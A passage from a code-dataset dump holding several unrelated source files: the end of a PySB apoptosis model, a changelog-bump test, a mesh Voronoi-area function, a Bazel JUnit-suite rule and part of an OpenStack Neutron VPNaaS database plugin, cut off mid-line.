C3pro=None) + C3A(Xiap=None, ParpU=None, C6pro=None), catalysis_1_C8A_catalyzer_C3pro_substrate_C3A_product_1kc)\nRule('catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product', C3A(Xiap=None, ParpU=None, C6pro=None) + C6pro(C3A=None) | C3A(Xiap=None, ParpU=None, C6pro=1) % C6pro(C3A=1), catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product_2kf, catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product_1kr)\nRule('catalysis_1_C3A_catalyzer_C6pro_substrate_C6A_product', C3A(Xiap=None, ParpU=None, C6pro=1) % C6pro(C3A=1) >> C3A(Xiap=None, ParpU=None, C6pro=None) + C6A(C8pro=None), catalysis_1_C3A_catalyzer_C6pro_substrate_C6A_product_1kc)\nRule('catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product', C6A(C8pro=None) + C8pro(Fadd=None, C6A=None) | C6A(C8pro=1) % C8pro(Fadd=None, C6A=1), catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product_2kf, catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product_1kr)\nRule('catalysis_1_C6A_catalyzer_C8pro_substrate_C8A_product', C6A(C8pro=1) % C8pro(Fadd=None, C6A=1) >> C6A(C8pro=None) + C8A(BidU=None, C3pro=None), catalysis_1_C6A_catalyzer_C8pro_substrate_C8A_product_1kc)\n\nInitial(Ligand(Receptor=None), Ligand_0)\nInitial(ParpU(C3A=None), ParpU_0)\nInitial(C8A(BidU=None, C3pro=None), C8A_0)\nInitial(SmacM(BaxA=None), SmacM_0)\nInitial(BaxM(BidM=None, BaxA=None), BaxM_0)\nInitial(Apop(C3pro=None, Xiap=None), Apop_0)\nInitial(Fadd(Receptor=None, C8pro=None), Fadd_0)\nInitial(SmacC(Xiap=None), SmacC_0)\nInitial(ParpC(), ParpC_0)\nInitial(Xiap(SmacC=None, Apop=None, C3A=None), 
Xiap_0)\nInitial(C9(), C9_0)\nInitial(C3ub(), C3ub_0)\nInitial(C8pro(Fadd=None, C6A=None), C8pro_0)\nInitial(Bcl2(BidM=None, BaxA=None), Bcl2_0)\nInitial(C3pro(Apop=None, C8A=None), C3pro_0)\nInitial(CytoCM(BaxA=None), CytoCM_0)\nInitial(CytoCC(), CytoCC_0)\nInitial(BaxA(BaxM=None, Bcl2=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None), BaxA_0)\nInitial(ApafI(), ApafI_0)\nInitial(BidU(C8A=None), BidU_0)\nInitial(BidT(), BidT_0)\nInitial(C3A(Xiap=None, ParpU=None, C6pro=None), C3A_0)\nInitial(ApafA(), ApafA_0)\nInitial(BidM(BaxM=None, Bcl2=None), BidM_0)\nInitial(Receptor(Ligand=None, Fadd=None), Receptor_0)\nInitial(C6A(C8pro=None), C6A_0)\nInitial(C6pro(C3A=None), C6pro_0)\n\n"} {"ext": "py", "sha": "1a309786af1c9973f12338e6c2279a5915624c25", "content": "from unittest import TestCase\nfrom unittest.mock import patch\nfrom pathlib import Path\nfrom click.testing import CliRunner\n\nfrom ..management.commands import bump_changelog\nfrom hourglass import changelog\nfrom hourglass.tests.test_changelog import UtilTests\n\n\ndef patch_new_version(version):\n return patch.object(bump_changelog, '__version__', version)\n\n\ndef patch_changelog_contents(contents):\n return patch.object(changelog, 'get_contents', lambda: contents)\n\n\nclass BumpChangelogTests(TestCase):\n @patch_new_version('9.0.0')\n @patch_changelog_contents(UtilTests.AFTER_BUMP)\n def test_it_reports_error_on_no_release_notes(self):\n result = CliRunner().invoke(bump_changelog.command)\n self.assertIn('The new release has no release notes', result.output)\n self.assertNotEqual(result.exit_code, 0)\n\n @patch_new_version('0.0.1')\n @patch_changelog_contents(UtilTests.BEFORE_BUMP)\n def test_it_reports_error_if_new_version_is_invalid(self):\n result = CliRunner().invoke(bump_changelog.command)\n self.assertIn('Please change hourglass/version.py', result.output)\n self.assertNotEqual(result.exit_code, 0)\n\n @patch_new_version('9.0.0')\n @patch_changelog_contents(UtilTests.BEFORE_BUMP)\n def test_it_works(self):\n runner = CliRunner()\n\n with runner.isolated_filesystem():\n fakelog = Path('fake-changelog.md')\n with patch.object(changelog, 'PATH', fakelog):\n result = CliRunner().invoke(bump_changelog.command)\n\n self.assertIn('Modifying CHANGELOG.md', result.output)\n self.assertEqual(result.exit_code, 0)\n\n with fakelog.open('r', encoding=changelog.ENCODING) as f:\n self.assertIn('9.0.0', f.read())\n\n tagmsg = Path('tag-message-v9.0.0.txt')\n\n with tagmsg.open('r', encoding=changelog.ENCODING) as f:\n self.assertIn('Fixed some stuff', f.read())\n\n\ndel UtilTests # So our test runner doesn't find and run them.\n"} {"ext": "py", "sha": "1a30982239f4de85dd80e93c26b92eca80e36f08", "content": "import numpy as np\n\n\ndef vertex_voronoi(mesh):\n \"\"\"\n compute vertex voronoi of a mesh as described in\n Meyer, M., Desbrun, M., Schroder, P., Barr, A. 
(2002).\n Discrete differential geometry operators for triangulated 2manifolds.\n Visualization and Mathematics, 1..26.\n :param mesh: trimesh object\n :return: numpy array of shape (mesh.vertices.shape[0],)\n \"\"\"\n Nbv = mesh.vertices.shape[0]\n Nbp = mesh.faces.shape[0]\n obt_angs = mesh.face_angles > np.pi / 2\n obt_poly = obt_angs[:, 0] | obt_angs[:, 1] | obt_angs[:, 2]\n print(' -percent polygon with obtuse angle ',\n 100.0 * len(np.where(obt_poly)[0]) / Nbp)\n cot = 1 / np.tan(mesh.face_angles)\n vert_voronoi = np.zeros(Nbv)\n for ind_p, p in enumerate(mesh.faces):\n if obt_poly[ind_p]:\n obt_verts = p[obt_angs[ind_p, :]]\n vert_voronoi[obt_verts] = vert_voronoi[obt_verts] + \\\n mesh.area_faces[ind_p] / 2.0\n non_obt_verts = p[[not x for x in obt_angs[ind_p, :]]]\n vert_voronoi[non_obt_verts] = vert_voronoi[non_obt_verts] + \\\n mesh.area_faces[ind_p] / 4.0\n else:\n d0 = np.sum(\n np.power(mesh.vertices[p[1], :] - mesh.vertices[p[2], :], 2))\n d1 = np.sum(\n np.power(mesh.vertices[p[2], :] - mesh.vertices[p[0], :], 2))\n d2 = np.sum(\n np.power(mesh.vertices[p[0], :] - mesh.vertices[p[1], :], 2))\n vert_voronoi[p[0]] = vert_voronoi[p[0]] + \\\n (d1 * cot[ind_p, 1] + d2 * cot[ind_p, 2]) / 8.0\n vert_voronoi[p[1]] = vert_voronoi[p[1]] + \\\n (d2 * cot[ind_p, 2] + d0 * cot[ind_p, 0]) / 8.0\n vert_voronoi[p[2]] = vert_voronoi[p[2]] + \\\n (d0 * cot[ind_p, 0] + d1 * cot[ind_p, 1]) / 8.0\n\n return vert_voronoi\n"} {"ext": "bzl", "sha": "1a3099728db5d040b873b478c2de06aba0688d07", "content": "# Copyright (C) 2016 The Android Open Source Project\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# Skylark rule to generate a Junit4 TestSuite\n# Assumes srcs are all .java Test files\n# Assumes junit4 is already added to deps by the user.\n\n# See https://github.com/bazelbuild/bazel/issues/1017 for background.\n\n_OUTPUT = \"\"\"import org.junit.runners.Suite;\nimport org.junit.runner.RunWith;\n\n@RunWith(Suite.class)\n@Suite.SuiteClasses({%s})\npublic class %s {}\n\"\"\"\n\n_PREFIXES = (\"org\", \"com\", \"edu\")\n\ndef _SafeIndex(j, val):\n for i, v in enumerate(j):\n if val == v:\n return i\n return -1\n\ndef _AsClassName(fname):\n fname = [x.path for x in fname.files.to_list()][0]\n toks = fname[:-5].split(\"/\")\n findex = -1\n for s in _PREFIXES:\n findex = _SafeIndex(toks, s)\n if findex != -1:\n break\n if findex == -1:\n fail(\"%s does not contain any of %s\" % (fname, _PREFIXES))\n return \".\".join(toks[findex:]) + \".class\"\n\ndef _impl(ctx):\n classes = \",\".join(\n [_AsClassName(x) for x in ctx.attr.srcs],\n )\n ctx.actions.write(output = ctx.outputs.out, content = _OUTPUT % (\n classes,\n ctx.attr.outname,\n ))\n\n_GenSuite = rule(\n attrs = {\n \"srcs\": attr.label_list(allow_files = True),\n \"outname\": attr.string(),\n },\n outputs = {\"out\": \"%{name}.java\"},\n implementation = _impl,\n)\n\nPOST_JDK8_OPTS = [\n # Enforce JDK 8 compatibility on Java 9, see\n # 
https://docs.oracle.com/javase/9/intl/internationalization-enhancements-jdk-9.htm#JSINT-GUID-AF5AECA7-07C1-4E7D-BC10-BC7E73DC6C7F\n \"-Djava.locale.providers=COMPAT,CLDR,SPI\",\n \"--add-opens=jdk.management/com.sun.management.internal=ALL-UNNAMED\",\n]\n\ndef junit_tests(name, srcs, **kwargs):\n s_name = name.replace(\"-\", \"_\") + \"TestSuite\"\n _GenSuite(\n name = s_name,\n srcs = srcs,\n outname = s_name,\n )\n jvm_flags = kwargs.get(\"jvm_flags\", [])\n jvm_flags = jvm_flags + select({\n \"//:java9\": POST_JDK8_OPTS,\n \"//:java_next\": POST_JDK8_OPTS,\n \"//conditions:default\": [],\n })\n native.java_test(\n name = name,\n test_class = s_name,\n srcs = srcs + [\":\" + s_name],\n **dict(kwargs, jvm_flags = jvm_flags)\n )\n"} {"ext": "py", "sha": "1a309a51d2ac17f98e6c30813c0f63ef4cabd740", "content": "# vim: tabstop=4 shiftwidth=4 softtabstop=4\n#\n# (c) Copyright 2013 Hewlett-Packard Development Company, L.P.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\n# @author: Swaminathan Vasudevan, Hewlett-Packard.\n\nimport sqlalchemy as sa\nfrom sqlalchemy import orm\nfrom sqlalchemy.orm import exc\n\nfrom neutron.common import constants as q_constants\nfrom neutron.db import agentschedulers_db as agent_db\nfrom neutron.db import api as qdbapi\nfrom neutron.db import db_base_plugin_v2 as base_db\nfrom neutron.db import l3_db\nfrom neutron.db import model_base\nfrom neutron.db import models_v2\nfrom neutron.extensions import vpnaas\nfrom neutron.extensions.vpnaas import VPNPluginBase\nfrom neutron import manager\nfrom neutron.openstack.common import log as logging\nfrom neutron.openstack.common import uuidutils\nfrom neutron.plugins.common import constants\n\nLOG = logging.getLogger(__name__)\n\n\nclass IPsecPeerCidr(model_base.BASEV2):\n \"\"\"Internal representation of a IPsec Peer Cidrs.\"\"\"\n\n cidr = sa.Column(sa.String(32), nullable=False, primary_key=True)\n ipsec_site_connection_id = sa.Column(\n sa.String(36),\n sa.ForeignKey('ipsec_site_connections.id',\n ondelete=\"CASCADE\"),\n primary_key=True)\n\n\nclass IPsecPolicy(model_base.BASEV2, models_v2.HasId, models_v2.HasTenant):\n \"\"\"Represents a v2 IPsecPolicy Object.\"\"\"\n __tablename__ = 'ipsecpolicies'\n name = sa.Column(sa.String(255))\n description = sa.Column(sa.String(255))\n transform_protocol = sa.Column(sa.Enum(\"esp\", \"ah\", \"ah-esp\",\n name=\"ipsec_transform_protocols\"),\n nullable=False)\n auth_algorithm = sa.Column(sa.Enum(\"sha1\",\n name=\"vpn_auth_algorithms\"),\n nullable=False)\n encryption_algorithm = sa.Column(sa.Enum(\"3des\", \"aes-128\",\n \"aes-256\", \"aes-192\",\n name=\"vpn_encrypt_algorithms\"),\n nullable=False)\n encapsulation_mode = sa.Column(sa.Enum(\"tunnel\", \"transport\",\n name=\"ipsec_encapsulations\"),\n nullable=False)\n lifetime_units = sa.Column(sa.Enum(\"seconds\", \"kilobytes\",\n name=\"vpn_lifetime_units\"),\n nullable=False)\n lifetime_value = sa.Column(sa.Integer, nullable=False)\n pfs = sa.Column(sa.Enum(\"group2\", \"group5\", \"group14\",\n 
name=\"vpn_pfs\"), nullable=False)\n\n\nclass IKEPolicy(model_base.BASEV2, models_v2.HasId, models_v2.HasTenant):\n \"\"\"Represents a v2 IKEPolicy Object.\"\"\"\n __tablename__ = 'ikepolicies'\n name = sa.Column(sa.String(255))\n description = sa.Column(sa.String(255))\n auth_algorithm = sa.Column(sa.Enum(\"sha1\",\n name=\"vpn_auth_algorithms\"),\n nullable=False)\n encryption_algorithm = sa.Column(sa.Enum(\"3des\", \"aes-128\",\n \"aes-256\", \"aes-192\",\n name=\"vpn_encrypt_algorithms\"),\n nullable=False)\n phase1_negotiation_mode = sa.Column(sa.Enum(\"main\",\n name=\"ike_phase1_mode\"),\n nullable=False)\n lifetime_units = sa.Column(sa.Enum(\"seconds\", \"kilobytes\",\n name=\"vpn_lifetime_units\"),\n nullable=False)\n lifetime_value = sa.Column(sa.Integer, nullable=False)\n ike_version = sa.Column(sa.Enum(\"v1\", \"v2\", name=\"ike_versions\"),\n nullable=False)\n pfs = sa.Column(sa.Enum(\"group2\", \"group5\", \"group14\",\n name=\"vpn_pfs\"), nullable=False)\n\n\nclass IPsecSiteConnection(model_base.BASEV2,\n models_v2.HasId, models_v2.HasTenant):\n \"\"\"Represents a IPsecSiteConnection Object.\"\"\"\n __tablename__ = 'ipsec_site_connections'\n name = sa.Column(sa.String(255))\n description = sa.Column(sa.String(255))\n peer_address = sa.Column(sa.String(64), nullable=False)\n peer_id = sa.Column(sa.String(255), nullable=False)\n route_mode = sa.Column(sa.String(8), nullable=False)\n mtu = sa.Column(sa.Integer, nullable=False)\n initiator = sa.Column(sa.Enum(\"bi-directional\", \"response-only\",\n name=\"vpn_initiators\"), nullable=False)\n auth_mode = sa.Column(sa.String(16), nullable=False)\n psk = sa.Column(sa.String(255), nullable=False)\n dpd_action = sa.Column(sa.Enum(\"hold\", \"clear\",\n \"restart\", \"disabled\",\n \"restart-by-peer\", name=\"vpn_dpd_actions\"),\n nullable=False)\n dpd_interval = sa.Column(sa.Integer, nullable=False)\n dpd_timeout = sa.Column(sa.Integer, nullable=False)\n status = sa.Column(sa.String(16), nullable=False)\n admin_state_up = sa.Column(sa.Boolean(), nullable=False)\n vpnservice_id = sa.Column(sa.String(36),\n sa.ForeignKey('vpnservices.id'),\n nullable=False)\n ipsecpolicy_id = sa.Column(sa.String(36),\n sa.ForeignKey('ipsecpolicies.id'),\n nullable=False)\n ikepolicy_id = sa.Column(sa.String(36),\n sa.ForeignKey('ikepolicies.id'),\n nullable=False)\n ipsecpolicy = orm.relationship(\n IPsecPolicy, backref='ipsec_site_connection')\n ikepolicy = orm.relationship(IKEPolicy, backref='ipsec_site_connection')\n peer_cidrs = orm.relationship(IPsecPeerCidr,\n backref='ipsec_site_connection',\n lazy='joined',\n cascade='all, delete, delete-orphan')\n\n\nclass VPNService(model_base.BASEV2, models_v2.HasId, models_v2.HasTenant):\n \"\"\"Represents a v2 VPNService Object.\"\"\"\n name = sa.Column(sa.String(255))\n description = sa.Column(sa.String(255))\n status = sa.Column(sa.String(16), nullable=False)\n admin_state_up = sa.Column(sa.Boolean(), nullable=False)\n subnet_id = sa.Column(sa.String(36), sa.ForeignKey('subnets.id'),\n nullable=False)\n router_id = sa.Column(sa.String(36), sa.ForeignKey('routers.id'),\n nullable=False)\n subnet = orm.relationship(models_v2.Subnet)\n router = orm.relationship(l3_db.Router)\n ipsec_site_connections = orm.relationship(\n IPsecSiteConnection,\n backref='vpnservice',\n cascade=\"all, delete-orphan\")\n\n\nclass VPNPluginDb(VPNPluginBase, base_db.CommonDbMixin):\n \"\"\"VPN plugin database class using SQLAlchemy models.\"\"\"\n\n def __init__(self):\n \"\"\"Do the initialization for the vpn service plugin 
here.\"\"\"\n qdbapi.register_models()\n\n def update_status(self, context, model, v_id, status):\n with context.session.begin(subtransactions=True):\n v_db = self._get_resource(context, model, v_id)\n v_db.update({'status': status})\n\n def _get_resource(self, context, model, v_id):\n try:\n r = self._get_by_id(context, model, v_id)\n except exc.NoResultFound:\n if issubclass(model, IPsecSiteConnection):\n raise vpnaas.IPsecSiteConnectionNotFound(\n ipsec_site_conn_id=v_id\n )\n elif issubclass(model, IKEPolicy):\n raise vpnaas.IKEPolicyNotFound(ikepolicy_id=v_id)\n elif issubclass(model, IPsecPolicy):\n raise vpnaas.IPsecPolicyNotFound(ipsecpolicy_id=v_id)\n elif issubclass(model, VPNService):\n raise vpnaas.VPNServiceNotFound(vpnservice_id=v_id)\n else:\n raise\n return r\n\n def assert_update_allowed(self, obj):\n status = getattr(obj, 'status', None)\n if status != constants.ACTIVE:\n raise vpnaas.VPNStateInvalid(id=id, state=status)\n\n def _make_ipsec_site_connection_dict(self, ipsec_site_conn, fields=None):\n\n res = {'id': ipsec_site_conn['id'],\n 'tenant_id': ipsec_site_conn['tenant_id'],\n 'name': ipsec_site_conn['name'],\n 'description': ipsec_site_conn['description'],\n 'peer_address': ipsec_site_conn['peer_address'],\n 'peer_id': ipsec_site_conn['peer_id'],\n 'route_mode': ipsec_site_conn['route_mode'],\n 'mtu': ipsec_site_conn['mtu'],\n 'auth_mode': ipsec_site_conn['auth_mode'],\n 'psk': ipsec_site_conn['psk'],\n 'initiator': ipsec_site_conn['initiator'],\n 'dpd': {\n 'action': ipsec_site_conn['dpd_action'],\n 'interval': ipsec_site_conn['dpd_interval'],\n 'timeout': ipsec_site_conn['dpd_timeout']\n },\n 'admin_state_up': ipsec_site_conn['admin_state_up'],\n 'status': ipsec_site_conn['status'],\n 'vpnservice_id': ipsec_site_conn['vpnservice_id'],\n 'ikepolicy_id': ipsec_site_conn['ikepolicy_id'],\n 'ipsecpolicy_id': ipsec_site_conn['ipsecpolicy_id'],\n 'peer_cidrs': [pcidr['cidr']\n for pcidr in ipsec_site_conn['peer_cidrs']]\n }\n\n return self._fields(res, fields)\n\n def create_ipsec_site_connection(self, context, ipsec_site_connection):\n ipsec_sitecon = ipsec_site_connection['ipsec_site_connection']\n dpd = ipsec_sitecon['dpd']\n ipsec_sitecon['dpd_action'] = dpd.get('action', 'hold')\n ipsec_sitecon['dpd_interval'] = dpd.get('interval', 30)\n ipsec_sitecon['dpd_timeout'] = dpd.get('timeout', 120)\n tenant_id = self._get_tenant_id_for_create(context, ipsec_sitecon)\n if ipsec_sitecon['dpd_timeout'] < ipsec_sitecon['dpd_interval']:\n raise vpnaas.IPsecSiteConnectionDpdIntervalValueError(\n attribute_a='dpd_timeout')\n with context.session.begin(subtransactions=True):\n #Check permissions\n self._get_resource(context,\n VPNService,\n ipsec_sitecon['vpnservice_id'])\n self._get_resource(context,\n IKEPolicy,\n ipsec_sitecon['ikepolicy_id'])\n self._get_resource(context,\n IPsecPolicy,\n ipsec_sitecon['ipsecpolicy_id'])\n ipsec_site_conn_db = IPsecSiteConnection(\n id=uuidutils.generate_uuid(),\n tenant_id=tenant_id,\n name=ipsec_sitecon['name'],\n description=ipsec_sitecon['description'],\n peer_address=ipsec_sitecon['peer_address'],\n peer_id=ipsec_sitecon['peer_id'],\n route_mode='static',\n mtu=ipsec_sitecon['mtu'],\n auth_mode='psk',\n psk=ipsec_sitecon['psk'],\n initiator=ipsec_sitecon['initiator'],\n dpd_action=ipsec_sitecon['dpd_action'],\n dpd_interval=ipsec_sitecon['dpd_interval'],\n dpd_timeout=ipsec_sitecon['dpd_timeout'],\n admin_state_up=ipsec_sitecon['admin_state_up'],\n status=constants.PENDING_CREATE,\n vpnservice_id=ipsec_sitecon['vpnservice_id'],\n 
ikepolicy_id=ipsec_sitecon['ikepolicy_id'],\n ipsecpolicy_id=ipsec_sitecon['ipsecpolicy_id']\n )\n context.session.add(ipsec_site_conn_db)\n for cidr in ipsec_sitecon['peer_cidrs']:\n peer_cidr_db = IPsecPeerCidr(\n cidr=cidr,\n ipsec_site_connection_id=ipsec_site_conn_db['id']\n )\n context.session.add(peer_cidr_db)\n return self._make_ipsec_site_connection_dict(ipsec_site_conn_db)\n\n def update_ipsec_site_connection(\n self, context,\n ipsec_site_conn_id, ipsec_site_connection):\n ipsec_sitecon = ipsec_site_connection['ipsec_site_connection']\n dpd = ipsec_sitecon.get('dpd', {})\n if dpd.get('action'):\n ipsec_sitecon['dpd_action'] = dpd.get('action')\n if dpd.get('interval'):\n ipsec_sitecon['dpd_interval'] = dpd.get('interval')\n if dpd.get('timeout'):\n ipsec_sitecon['dpd_timeout'] = dpd.get('timeout')\n changed_peer_cidrs = False\n with context.session.begin(subtransactions=True):\n ipsec_site_conn_db = self._get_resource(\n context,\n IPsecSiteConnection,\n ipsec_site_conn_id)\n self.assert_update_allowed(ipsec_site_conn_db)\n if \"peer_cidrs\" in ipsec_sitecon:\n changed_peer_cidrs = True\n old_peer_cidr_list = ipsec_site_conn_db['peer_cidrs']\n old_peer_cidr_dict = dict(\n (peer_cidr['cidr'], peer_cidr)\n for peer_cidr in old_peer_cidr_list)\n new_peer_cidr_set = set(ipsec_sitecon[\"peer_cidrs\"])\n old_peer_cidr_set = set(old_peer_cidr_dict)\n\n new_peer_cidrs = list(new_peer_cidr_set)\n for peer_cidr in old_peer_cidr_set - new_peer_cidr_set:\n context.session.delete(old_peer_cidr_dict[peer_cidr])\n for peer_cidr in new_peer_cidr_set - old_peer_cidr_set:\n pcidr = IPsecPeerCidr(\n cidr=peer_cidr,\n ipsec_site_connection_id=ipsec_site_conn_id)\n context.session.add(pcidr)\n del ipsec_sitecon[\"peer_cidrs\"]\n if ipsec_sitecon:\n ipsec_site_conn_db.update(ipsec_sitecon)\n result = self._make_ipsec_site_connection_dict(ipsec_site_conn_db)\n if changed_peer_cidrs:\n result['peer_cidrs'] = new_peer_cidrs\n return result\n\n def delete_ipsec_site_connection(self, context, ipsec_site_conn_id):\n with context.session.begin(subtransactions=True):\n ipsec_site_conn_db = self._get_resource(\n context, IPsecSiteConnection, ipsec_site_conn_id\n )\n context.session.delete(ipsec_site_conn_db)\n\n def get_ipsec_site_connection(self, context,\n ipsec_site_conn_id, fields=None):\n ipsec_site_conn_db = self._get_resource(\n context, IPsecSiteConnection, ipsec_site_conn_id\n )\n return self._make_ipsec_site_connection_dict(\n ipsec_site_conn_db, fields)\n\n def get_ipsec_site_connections(self, context, filters=None, fields=None):\n return self._get_collection(context, IPsecSiteConnection,\n self._make_ipsec_site_connection_dict,\n filters=filters, fields=fields)\n\n def _make_ikepolicy_dict(self, ikepolicy, fields=None):\n res = {'id': ikepolicy['id'],\n 'tenant_id': ikepolicy['tenant_id'],\n 'name': ikepolicy['name'],\n 'description': ikepolicy['description'],\n 'auth_algorithm': ikepolicy['auth_algorithm'],\n 'encryption_algorithm': ikepolicy['encryption_algorithm'],\n 'phase1_negotiation_mode': ikepolicy['phase1_negotiation_mode'],\n 'lifetime': {\n 'units': ikepolicy['lifetime_units'],\n 'value': ikepolicy['lifetime_value'],\n },\n 'ike_version': ikepolicy['ike_version'],\n 'pfs': ikepolicy['pfs']\n }\n\n return self._fields(res, fields)\n\n def create_ikepolicy(self, context, ikepolicy):\n ike = ikepolicy['ikepolicy']\n tenant_id = self._get_tenant_id_for_create(context, ike)\n lifetime_info = ike.get('lifetime', [])\n lifetime_units = lifetime_info.get('units', 'seconds')\n lifetime_value = 
lifetime_info.get('value', 3600)\n\n with context.session.begin(subtransactions=True):\n ike_db = IKEPolicy(\n id=uuidutils.generate_uuid(),\n tenant_id=tenant_id,\n name=ike['name'],\n description=ike['description'],\n auth_algorithm=ike['auth_algorithm'],\n encryption_algorithm=ike['encryption_algorithm'],\n phase1_negotiation_mode=ike['phase1_negotiation_mode'],\n lifetime_units=lifetime_units,\n lifetime_value=lifetime_value,\n ike_version=ike['ike_version'],\n pfs=ike['pfs']\n )\n\n context.session.add(ike_db)\n return self._make_ikepolicy_dict(ike_db)\n\n def update_ikepolicy(self, context, ikepolicy_id, ikepolicy):\n ike = ikepolicy['ikepolicy']\n with context.session.begin(subtransactions=True):\n ikepolicy = context.session.query(IPsecSiteConnection).filter_by(\n ikepolicy_id=ikepolicy_id).first()\n if ikepolicy:\n raise vpnaas.IKEPolicyInUse(ikepolicy_id=ikepolicy_id)\n ike_db = self._get_resource(context, IKEPolicy, ikepolicy_id)\n if ike:\n lifetime_info = ike.get('lifetime')\n if lifetime_info:\n if lifetime_info.get('units'):\n ike['lifetime_units'] = lifetime_info['units']\n if lifetime_info.get('value'):\n ike['lifetime_value'] = lifetime_info['value']\n ike_db.update(ike)\n return self._make_ikepolicy_dict(ike_db)\n\n def delete_ikepolicy(self, context, ikepolicy_id):\n with context.session.begin(subtransactions=True):\n ikepolicy = context.session.query(IPsecSiteConnection).filter_by(\n ikepolicy_id=ikepolicy_id).first()\n if ikepolicy:\n raise vpnaas.IKEPolicyInUse(ikepolicy_id=ikepolicy_id)\n ike_db = self._get_resource(context, IKEPolicy, ikepolicy_id)\n context.session.delete(ike_db)\n\n def get_ikepolicy(self, context, ikepolicy_id, fields=None):\n ike_db = self._get_resource(context, IKEPolicy, ikepolicy_id)\n return self._make_ikepolicy_dict(ike_db, fields)\n\n def get_ikepolicies(self, context, filters=None, fields=None):\n return self._get_collection(context, IKEPolicy,\n self._make_ikepolicy_dict,\n filters=filters, fields=fields)\n\n def _make_ipsecpolicy_dict(self, ipsecpolicy, fields=None):\n\n res = {'id': ipsecpolicy['id'],\n 'tenant_id': ipsecpolicy['tenant_id'],\n 'name': ipsecpolicy['name'],\n 'description': ipsecpolicy['description'],\n 'transform_protocol': ipsecpolicy['transform_protocol'],\n 'auth_algorithm': ipsecpolicy['auth_algorithm'],\n 'encryption_algorithm': ipsecpolicy['encryption_algorithm'],\n 'encapsulation_mode': ipsecpolicy['encapsulation_mode'],\n 'lifetime': {\n 'units': ipsecpolicy['lifetime_units'],\n 'value': ipsecpolicy['lifetime_value'],\n },\n 'pfs': ipsecpolicy['pfs']\n }\n\n return self._fields(res, fields)\n\n def create_ipsecpolicy(self, context, ipsecpolicy):\n ipsecp = ipsecpolicy['ipsecpolicy']\n tenant_id = self._get_tenant_id_for_create(context, ipsecp)\n lifetime_info = ipsecp['lifetime']\n lifetime_units = lifetime_info.get('units', 'seconds')\n lifetime_value = lifetime_info.get('value', 3600)\n\n with context.session.begin(subtransactions=True):\n ipsecp_db = IPsecPolicy(id=uuidutils.generate_uuid(),\n tenant_id=tenant_id,\n name=ipsecp['name'],\n description=ipsecp['description'],\n transform_protocol=ipsecp['transform_'\n 'protocol'],\n auth_algorithm=ipsecp['auth_algorithm'],\n encryption_algorithm=ipsecp['encryption_'\n 'algorithm'],\n encapsulation_mode=ipsecp['encapsulation_'\n 'mode'],\n lifetime_units=lifetime_units,\n lifetime_value=lifetime_value,\n pfs=ipsecp['pfs'])\n context.session.add(ipsecp_db)\n return self._make_ipsecpolicy_dict(ipsecp_db)\n\n def update_ipsecpolicy(self, context, ipsecpolicy_id, 
ipsecpolicy):\n ipsecp = ipsecpolicy['ipsecpolicy']\n with context.session.begin(subtransactions=True):\n ipsecpolicy = context.session.query(IPsecSiteConnection).filter_by(\n ipsecpolicy_id=ipsecpolicy_id).first()\n if ipsecpolicy:\n raise vpnaas.IPsecPolicyInUse(ipsecpolicy_id=ipsecpolicy_id)\n ipsecp_db = self._get_resource(context,\n IPsecPolicy,\n ipsecpolicy_id)\n if ipsecp:\n lifetime_info = ipsecp.get('lifetime')\n if lifetime_info:\n if lifetime_info.get('units'):\n ipsecp['lifetime_units'] = lifetime_info['units']\n if lifetime_info('value'):\n ipsecp['lifetime_value'] = lifetime_info['value']\n ipsecp_db.update(ipsecp)\n return self._make_ipsecpolicy_dict(ipsecp_db)\n\n def delete_ipsecpolicy(self, context, ipsecpolicy_id):\n with context.session.begin(subtransactions=True):\n ipsecpolicy = context.session.query(IPsecSiteConnection).filter_by(\n ipsecpolicy_id=ipsecpolicy_id).first()\n if ipsecpolicy:\n raise vpnaas.IPsecPolicyInUse(ipsecpolicy_id=ipsecpolicy_id)\n ipsec_db = self._get_resource(context, IPsecPolicy, ipsecpolicy_id)\n context.session.delete(ipsec_db)\n\n def get_ipsecpolicy(self, context, ipsecpolicy_id, fields=None):\n ipsec_db = self._get_resource(context, IPsecPolicy, ipsecpolicy_id)\n return self._make_ipsecpolicy_dict(ipsec_db, fields)\n\n def get_ipsecpolicies(self, context, filters=None, fields=None):\n return self._get_collection(context, IPsecPolicy,\n self._make_ipsecpolicy_dict,\n filters=filters, fields=fields)\n\n def _make_vpnservice_dict(self, vpnservice, fields=None):\n res = {'id': vpnservice['id'],\n 'name': vpnservice['name'],\n 'description': vpnservice['description'],\n 'tenant_id': vpnservice['tenant_id'],\n 'subnet_id': vpnservice['subnet_id'],\n 'router_id': vpnservice['router_id'],\n 'admin_state_up': vpnservice['admin_state_up'],\n 'status': vpnservice['status']}\n return self._fields(res, fields)\n\n def create_vpnservice(self, context, vpnservice):\n vpns = vpnservice['vpnservice']\n tenant_id = self._get_tenant_id_for_create(context, vpns)\n with context.session.begin(subtransactions=True):\n vpnservice_db = VPNService(id=uuidutils.generate_uuid(),\n tenant_id=tenant_id,\n name=vpns['name'],\n description=vpns['description'],\n subnet_id=vpns['subnet_id'],\n router_id=vpns['router_id'],\n admin_state_up=vpns['admin_state_up'],\n status=constants.PENDING_CREATE)\n context.session.add(vpnservice_db)\n return self._make_vpnservice_dict(vpnservice_db)\n\n def update_vpnservice(self, context, vpnservice_id, vpnservice):\n vpns = vpnservice['vpnservice']\n with context.session.begin(subtransactions=True):\n vpnservice = context.session.query(IPsecSiteConnection).filter_by(\n 